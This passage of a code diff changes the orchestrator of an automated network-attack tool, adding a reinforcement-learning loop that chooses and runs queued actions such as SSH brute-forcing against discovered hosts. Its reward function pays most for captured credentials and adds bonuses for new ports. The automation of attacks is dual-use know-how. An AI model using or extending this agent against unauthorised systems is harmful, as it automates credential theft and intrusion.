hostnames_str = host.get('hostnames', '')
hostname = hostnames_str.split(';')[0] if hostnames_str else ''
return {
'mac': mac_address,
'ports': ports,
'hostname': hostname
}
except Exception as e:
logger.error(f"Error building host state: {e}")
return {'mac': mac_address, 'ports': [], 'hostname': ''}
def _calculate_reward(
self,
action_name: str,
success: bool,
duration: float,
mac: str,
state_before: Dict,
state_after: Dict
) -> float:
"""
Calculate reward for RL update.
Reward structure:
- Base: +50 for success, -5 for failure
- Credentials found: +100
- New services: +20 per service
- Time bonus: +20 if <30s, -10 if >120s
- New ports discovered: +15 per port
Args:
action_name: Name of action executed
success: Did action succeed?
duration: Execution time in seconds
mac: Target MAC address
state_before: State dict before action
state_after: State dict after action
Returns:
Reward value (float)
"""
if not self._is_action_eligible_for_ai_learning(action_name):
return 0.0
# Base reward
reward = 50.0 if success else -5.0
if not success:
# Penalize time waste on failure
reward -= (duration * 0.1)
return reward
# ─────────────────────────────────────────────────────────
# Check for credentials found (high value!)
# ─────────────────────────────────────────────────────────
try:
recent_creds = self.shared_data.db.query("""
SELECT COUNT(*) as cnt FROM creds
WHERE mac_address=?
AND first_seen > datetime('now', '-1 minute')
""", (mac,))
if recent_creds and recent_creds[0]['cnt'] > 0:
creds_count = recent_creds[0]['cnt']
reward += 100 * creds_count # 100 per credential!
logger.info(f"RL: +{100*creds_count} reward for {creds_count} credentials")
except Exception as e:
logger.error(f"Error checking credentials: {e}")
# ─────────────────────────────────────────────────────────
# Check for new services discovered
# ─────────────────────────────────────────────────────────
try:
# Compare ports before/after
ports_before = set(state_before.get('ports', []))
ports_after = set(state_after.get('ports', []))
new_ports = ports_after - ports_before
if new_ports:
reward += 15 * len(new_ports)
logger.info(f"RL: +{15*len(new_ports)} reward for {len(new_ports)} new ports")
except Exception as e:
logger.error(f"Error checking new ports: {e}")
# ─────────────────────────────────────────────────────────
# Time efficiency bonus/penalty
# ─────────────────────────────────────────────────────────
if duration < 30:
reward += 20 # Fast execution bonus
elif duration > 120:
reward -= 10 # Slow execution penalty
# ─────────────────────────────────────────────────────────
# Action-specific bonuses
# ─────────────────────────────────────────────────────────
if action_name == "SSHBruteforce" and success:
# Extra bonus for SSH success (difficult action)
reward += 30
logger.debug(f"RL Reward calculated: {reward:.1f} for {action_name}")
return reward
def execute_queued_action(self, queued_action: Dict[str, Any]) -> bool: def execute_queued_action(self, queued_action: Dict[str, Any]) -> bool:
"""Execute a single queued action""" """Execute a single queued action with RL integration"""
queue_id = queued_action['id'] queue_id = queued_action['id']
action_name = queued_action['action_name'] action_name = queued_action['action_name']
mac = queued_action['mac_address'] mac = queued_action['mac_address']
ip = queued_action['ip'] ip = queued_action['ip']
port = queued_action['port'] port = queued_action['port']
logger.info(f"Executing: {action_name} for {ip}:{port}") # Parse metadata once — used throughout this function
metadata = json.loads(queued_action.get('metadata', '{}'))
source = str(metadata.get('decision_method', 'unknown'))
source_label = f"[{source.upper()}]" if source != 'unknown' else ""
decision_origin = str(metadata.get('decision_origin', 'unknown'))
ai_confidence = metadata.get('ai_confidence')
ai_threshold = metadata.get('ai_threshold', getattr(self.shared_data, "ai_confirm_threshold", 0.3))
ai_reason = str(metadata.get('ai_reason', 'n/a'))
ai_method = metadata.get('ai_method')
if not ai_method:
ai_method = (metadata.get('ai_debug') or {}).get('method')
ai_method = str(ai_method or 'n/a')
ai_model_loaded = bool(metadata.get('ai_model_loaded', bool(getattr(self.ai_engine, "model_loaded", False)) if self.ai_engine else False))
decision_scope = str(metadata.get('decision_scope', 'unknown'))
exec_payload = {
"action": action_name,
"target": ip,
"port": port,
"decision_method": source,
"decision_origin": decision_origin,
"decision_scope": decision_scope,
"ai_method": ai_method,
"ai_confidence": ai_confidence if isinstance(ai_confidence, (int, float)) else None,
"ai_threshold": ai_threshold if isinstance(ai_threshold, (int, float)) else None,
"ai_model_loaded": ai_model_loaded,
"ai_reason": ai_reason,
}
logger.info(f"Executing {source_label}: {action_name} for {ip}:{port}")
logger.info(f"[DECISION_EXEC] {json.dumps(exec_payload)}")
# Guard rail: stale queue rows can exist for disabled or not-loaded actions.
try:
action_row = self.shared_data.db.get_action_by_class(action_name)
if action_row and not self._is_enabled_value(action_row.get("b_enabled", 1)):
self.shared_data.db.update_queue_status(
queue_id,
'cancelled',
f"Action {action_name} disabled (b_enabled=0)",
)
logger.info(f"Skipping queued disabled action: {action_name}")
return False
except Exception as e:
logger.debug(f"Could not verify b_enabled for {action_name}: {e}")
if action_name not in self.actions:
self.shared_data.db.update_queue_status(
queue_id,
'cancelled',
f"Action {action_name} not loaded",
)
logger.warning(f"Skipping queued action not loaded: {action_name}")
return False
# ┌─────────────────────────────────────────────────────────┐
# │ STEP 1: Capture state BEFORE action (all modes) │
# └─────────────────────────────────────────────────────────┘
state_before = None
if self.feature_logger:
try:
state_before = self._build_host_state(mac)
logger.debug(f"State before captured for {mac}")
except Exception as e:
logger.info_throttled(
f"State capture skipped: {e}",
key="orch_state_before_failed",
interval_s=120.0,
)
# Update status to running # Update status to running
self.shared_data.db.update_queue_status(queue_id, 'running') self.shared_data.db.update_queue_status(queue_id, 'running')
# ┌─────────────────────────────────────────────────────────┐
# │ EXECUTE ACTION (existing code) │
# └─────────────────────────────────────────────────────────┘
start_time = time.time()
success = False
try: try:
# Check if action is loaded
if action_name not in self.actions:
raise Exception(f"Action {action_name} not loaded")
action = self.actions[action_name] action = self.actions[action_name]
# Prepare row data for compatibility # Prepare row data for compatibility
@@ -115,12 +501,49 @@ class Orchestrator:
"Alive": 1 "Alive": 1
} }
# Prepare status details
if ip and ip != "0.0.0.0":
port_str = str(port).strip() if port is not None else ""
has_port = bool(port_str) and port_str.lower() != "none"
target_display = f"{ip}:{port_str}" if has_port else ip
status_msg = f"{action_name} on {ip}"
details = f"Target: {target_display}"
self.shared_data.action_target_ip = target_display
else:
status_msg = f"{action_name} (Global)"
details = "Scanning network..."
self.shared_data.action_target_ip = ""
# Update shared status for display # Update shared status for display
self.shared_data.bjorn_orch_status = action_name self.shared_data.bjorn_orch_status = action_name
self.shared_data.bjorn_status_text2 = ip self.shared_data.bjorn_status_text2 = self.shared_data.action_target_ip or ip
self.shared_data.update_status(status_msg, details)
# Check if global action # --- AI Dashboard Metadata (AI mode only) ---
metadata = json.loads(queued_action.get('metadata', '{}')) if (
self.ai_enabled
and self.shared_data.operation_mode == "AI"
and self._is_action_eligible_for_ai_learning(action_name)
):
decision_method = metadata.get('decision_method', 'heuristic')
self.shared_data.active_action = action_name
self.shared_data.last_decision_method = decision_method
self.shared_data.last_ai_decision = metadata.get('ai_debug', {})
ai_exec_payload = {
"action": action_name,
"method": decision_method,
"origin": decision_origin,
"target": ip,
"ai_method": ai_method,
"ai_confidence": ai_confidence if isinstance(ai_confidence, (int, float)) else None,
"ai_threshold": ai_threshold if isinstance(ai_threshold, (int, float)) else None,
"ai_model_loaded": ai_model_loaded,
"reason": ai_reason,
}
logger.info(f"[AI_EXEC] {json.dumps(ai_exec_payload)}")
# Check if global action (metadata already parsed above)
if metadata.get('is_global') and hasattr(action, 'scan'): if metadata.get('is_global') and hasattr(action, 'scan'):
# Execute global scan # Execute global scan
action.scan() action.scan()
@@ -134,23 +557,92 @@ class Orchestrator:
action_name action_name
) )
# Determine success
success = (result == 'success')
# Update queue status based on result # Update queue status based on result
if result == 'success': if success:
self.shared_data.db.update_queue_status(queue_id, 'success') self.shared_data.db.update_queue_status(queue_id, 'success')
logger.success(f"Action {action_name} completed successfully for {ip}") logger.success(f"Action {action_name} completed successfully for {ip}")
else: else:
self.shared_data.db.update_queue_status(queue_id, 'failed') self.shared_data.db.update_queue_status(queue_id, 'failed')
logger.warning(f"Action {action_name} failed for {ip}") logger.warning(f"Action {action_name} failed for {ip}")
return result == 'success'
except Exception as e: except Exception as e:
logger.error(f"Error executing action {action_name}: {e}") logger.error(f"Error executing action {action_name}: {e}")
self.shared_data.db.update_queue_status(queue_id, 'failed', str(e)) self.shared_data.db.update_queue_status(queue_id, 'failed', str(e))
return False success = False
finally: finally:
if (
self.ai_enabled
and self.shared_data.operation_mode == "AI"
and self._is_action_eligible_for_ai_learning(action_name)
):
ai_done_payload = {
"action": action_name,
"success": bool(success),
"method": source,
"origin": decision_origin,
}
logger.info(f"[AI_DONE] {json.dumps(ai_done_payload)}")
self.shared_data.active_action = None
# Clear status text # Clear status text
self.shared_data.bjorn_status_text2 = "" self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
# Reset Status to Thinking/Idle
self.shared_data.update_status("Thinking", "Processing results...")
duration = time.time() - start_time
# ┌─────────────────────────────────────────────────────────┐
# │ STEP 2: Log execution features (AUTO + AI modes) │
# └─────────────────────────────────────────────────────────┘
if self.feature_logger and state_before and self._is_action_eligible_for_ai_learning(action_name):
try:
reward = self._calculate_reward(
action_name=action_name,
success=success,
duration=duration,
mac=mac,
state_before=state_before,
state_after=self._build_host_state(mac),
)
self.feature_logger.log_action_execution(
mac_address=mac,
ip_address=ip,
action_name=action_name,
success=success,
duration=duration,
reward=reward,
raw_event={
'port': port,
'action': action_name,
'queue_id': queue_id,
# metadata already parsed — no second json.loads
'metadata': metadata,
# Tag decision source so the training pipeline can weight
# human choices (MANUAL would be logged if orchestrator
# ever ran in that mode) vs automated ones.
'decision_source': self.shared_data.operation_mode,
'human_override': False,
},
)
logger.debug(f"Features logged for {action_name} (mode={self.shared_data.operation_mode})")
except Exception as e:
logger.info_throttled(
f"Feature logging skipped: {e}",
key="orch_feature_log_failed",
interval_s=120.0,
)
elif self.feature_logger and state_before:
logger.debug(f"Feature logging disabled for {action_name} (excluded from AI learning)")
return success
def run(self): def run(self):
"""Main loop: start scheduler and consume queue""" """Main loop: start scheduler and consume queue"""
@@ -164,9 +656,13 @@ class Orchestrator:
# Main execution loop # Main execution loop
idle_time = 0 idle_time = 0
consecutive_idle_logs = 0 consecutive_idle_logs = 0
self._last_background_task = 0
while not self.shared_data.orchestrator_should_exit: while not self.shared_data.orchestrator_should_exit:
try: try:
# Allow live mode switching from the UI without restarting the process.
self._sync_ai_components()
# Get next action from queue # Get next action from queue
next_action = self.get_next_action() next_action = self.get_next_action()
@@ -174,14 +670,17 @@ class Orchestrator:
# Reset idle counters # Reset idle counters
idle_time = 0 idle_time = 0
consecutive_idle_logs = 0 consecutive_idle_logs = 0
self._loop_error_backoff = 1.0
# Execute the action # Execute the action
self.execute_queued_action(next_action) self.execute_queued_action(next_action)
else: else:
# IDLE mode # IDLE mode
idle_time += 1 idle_time += 1
self.shared_data.bjorn_orch_status = "IDLE" self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text2 = "" self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
# Log periodically (less spam) # Log periodically (less spam)
if idle_time % 30 == 0: # Every 30 seconds if idle_time % 30 == 0: # Every 30 seconds
@@ -192,18 +691,96 @@ class Orchestrator:
# Event-driven wait (max 5s to check for exit signals) # Event-driven wait (max 5s to check for exit signals)
self.shared_data.queue_event.wait(timeout=5) self.shared_data.queue_event.wait(timeout=5)
self.shared_data.queue_event.clear() self.shared_data.queue_event.clear()
# Periodically process background tasks (even if busy)
current_time = time.time()
sync_interval = int(getattr(self.shared_data, "ai_sync_interval", 60))
if current_time - self._last_background_task > sync_interval:
self._process_background_tasks()
self._last_background_task = current_time
except Exception as e: except Exception as e:
logger.error(f"Error in orchestrator loop: {e}") logger.error(f"Error in orchestrator loop: {e}")
time.sleep(1) time.sleep(self._loop_error_backoff)
self._loop_error_backoff = min(self._loop_error_backoff * 2.0, 10.0)
# Cleanup on exit # Cleanup on exit (OUTSIDE while loop)
if self.scheduler: if self.scheduler:
self.scheduler.stop() self.scheduler.stop()
self.shared_data.queue_event.set()
if self.scheduler_thread and self.scheduler_thread.is_alive():
self.scheduler_thread.join(timeout=10.0)
if self.scheduler_thread.is_alive():
logger.warning("ActionScheduler thread did not exit cleanly")
logger.info("Orchestrator stopped") logger.info("Orchestrator stopped")
def _process_background_tasks(self):
"""Run periodic tasks like consolidation, upload retries, and model updates (AI mode only)."""
if not (self.ai_enabled and self.shared_data.operation_mode == "AI"):
return
ai_server_contact_events: List[bool] = []
try:
# Consolidate features
batch_size = int(getattr(self.shared_data, "ai_batch_size", 100))
max_batches = max(1, int(getattr(self.shared_data, "ai_consolidation_max_batches", 2)))
stats = self.data_consolidator.consolidate_features(
batch_size=batch_size,
max_batches=max_batches,
)
if stats.get("records_processed", 0) > 0:
logger.info(f"AI Consolidation: {stats['records_processed']} records processed")
logger.debug(f"DEBUG STATS: {stats}")
# Auto-export after consolidation
max_export_records = max(100, int(getattr(self.shared_data, "ai_export_max_records", 1000)))
filepath, count = self.data_consolidator.export_for_training(
format="csv",
compress=True,
max_records=max_export_records,
)
if filepath:
logger.info(f"AI export ready: {count} records -> {filepath}")
self.data_consolidator.upload_to_server(filepath)
if getattr(self.data_consolidator, "last_server_attempted", False):
ai_server_contact_events.append(
bool(getattr(self.data_consolidator, "last_server_contact_ok", False))
)
# Always retry any pending uploads when the server comes back.
self.data_consolidator.flush_pending_uploads(max_files=2)
if getattr(self.data_consolidator, "last_server_attempted", False):
ai_server_contact_events.append(
bool(getattr(self.data_consolidator, "last_server_contact_ok", False))
)
except Exception as e:
logger.info_throttled(
f"AI background tasks skipped: {e}",
key="orch_ai_background_failed",
interval_s=120.0,
)
# Check for model updates (tolerant when server is offline)
try:
if self.ai_engine and self.ai_engine.check_for_updates():
logger.info("AI model updated from server")
if self.ai_engine and getattr(self.ai_engine, "last_server_attempted", False):
ai_server_contact_events.append(
bool(getattr(self.ai_engine, "last_server_contact_ok", False))
)
elif self.ai_engine and not bool(getattr(self.ai_engine, "model_loaded", False)):
# No model loaded and no successful server contact path this cycle.
ai_server_contact_events.append(False)
except Exception as e:
logger.debug(f"AI model update check skipped: {e}")
self._update_ai_server_health(ai_server_contact_events)
if __name__ == "__main__": if __name__ == "__main__":
orchestrator = Orchestrator() orchestrator = Orchestrator()
orchestrator.run() orchestrator.run()

Binary file not shown.

Before

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

Before

Width:  |  Height:  |  Size: 438 B

Some files were not shown because too many files have changed in this diff Show More